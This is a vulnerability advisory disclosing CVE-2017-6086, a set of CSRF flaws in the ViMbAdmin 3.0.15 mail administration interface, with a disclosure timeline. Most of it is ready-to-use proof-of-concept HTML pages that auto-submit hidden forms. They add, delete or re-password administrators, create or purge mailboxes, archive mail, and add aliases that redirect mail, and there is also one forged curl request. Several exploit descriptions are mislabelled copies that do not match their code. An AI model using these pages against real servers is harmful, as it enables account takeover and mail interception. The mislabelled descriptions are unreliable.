# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15

## Product Description

ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at http://www.vimbadmin.net and the source code of the application is available on github https://github.com/opensolutions.

## Details

**CVE ID**: CVE-2017-6086

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-352

**CVSS Base Score**: 8.8

**CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

## Proof of concept

### Add administrator user

#### Exploit

The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/add" method="POST" target="csrf-frame" >
<input type="text" name="user" value="target@email" >
<input type="text" name="password" value="newpassword" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>

```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Remove administrator user

#### Exploit

The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/purge/aid/<administrator id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Change administrator password

#### Exploit

The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/admin/password/aid/<administrator id>" method="POST" target="csrf-frame" >
<input type="text" name="password" value="newpassword" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `passwordAction()` method of the `<vimbadmin directory>/application/controllers/DomainController.php` file.

### Add mailbox address

#### Exploit

The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fakeemail>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="name" value="<fake name>" >
<input type="text" name="password" value="<password>" >
<input type="text" name="quota" value="0" >
<input type="text" name="alt_email" value="" >
<input type="text" name="cc_welcome_email" value="" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.

### Purge mailbox

#### Exploit

The following html/javascript code allows to remove a mailbox address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/mailbox/purge/mid/<mailbox id>" method="POST" target="csrf-frame" >
<input type="text" name="data" value="purge" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `purgeAction()` method of the `<vimbadmin directory>/application/controllers/MailboxController.php` file.

### Archive mailbox

#### Exploit

The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/archive/add/mid/<mailbox id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/ArchiveController.php` file.

### Add alias address

#### Exploit

The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application.

```html
curl 'http://<ip>/alias/add/did/<domain id>'  --data 'local_part=<fake mailbox>&domain=<domain id>&goto%5B%5D=<redirection email address>'
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/add/did/<domain id>" method="POST" target="csrf-frame" >
<input type="text" name="local_part" value="<fake mailbox>" >
<input type="text" name="domain" value="<domain id>" >
<input type="text" name="goto[]" value="<redirection email address>" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.

### Remove alias address

#### Exploit

The following html/javascript code allows the removal of a alias address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application.

```html
<head>
<title>CSRF ViMbAdmin</title>
</head>
<body>


<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://<target ip>/alias/delete/alid/<alias id>" method="GET" target="csrf-frame" >
</form>


<script>document.getElementById("csrf-form").submit()</script>

</body>
```

#### Vulnerable Code

The vulnerable code is located in the `addAction()` method of the `<vimbadmin directory>/application/controllers/AliasController.php` file.

## Affected version

* tested on version 3.0.15

## Timeline (dd/mm/yyyy)

* 22/01/2017 : Initial discovery.
* 16/02/2017 : First contact with opensolutions.io
* 16/02/2017 : Advisory sent.
* 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities.
* 13/03/2017 : Sysdream Labs request for an update.
* 29/03/2017 : Second request for an update.
* 29/03/2017 : Reply from the owner stating that he has no time to fix the issues.
* 03/05/2017 : Full disclosure.


## Credits

* Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com)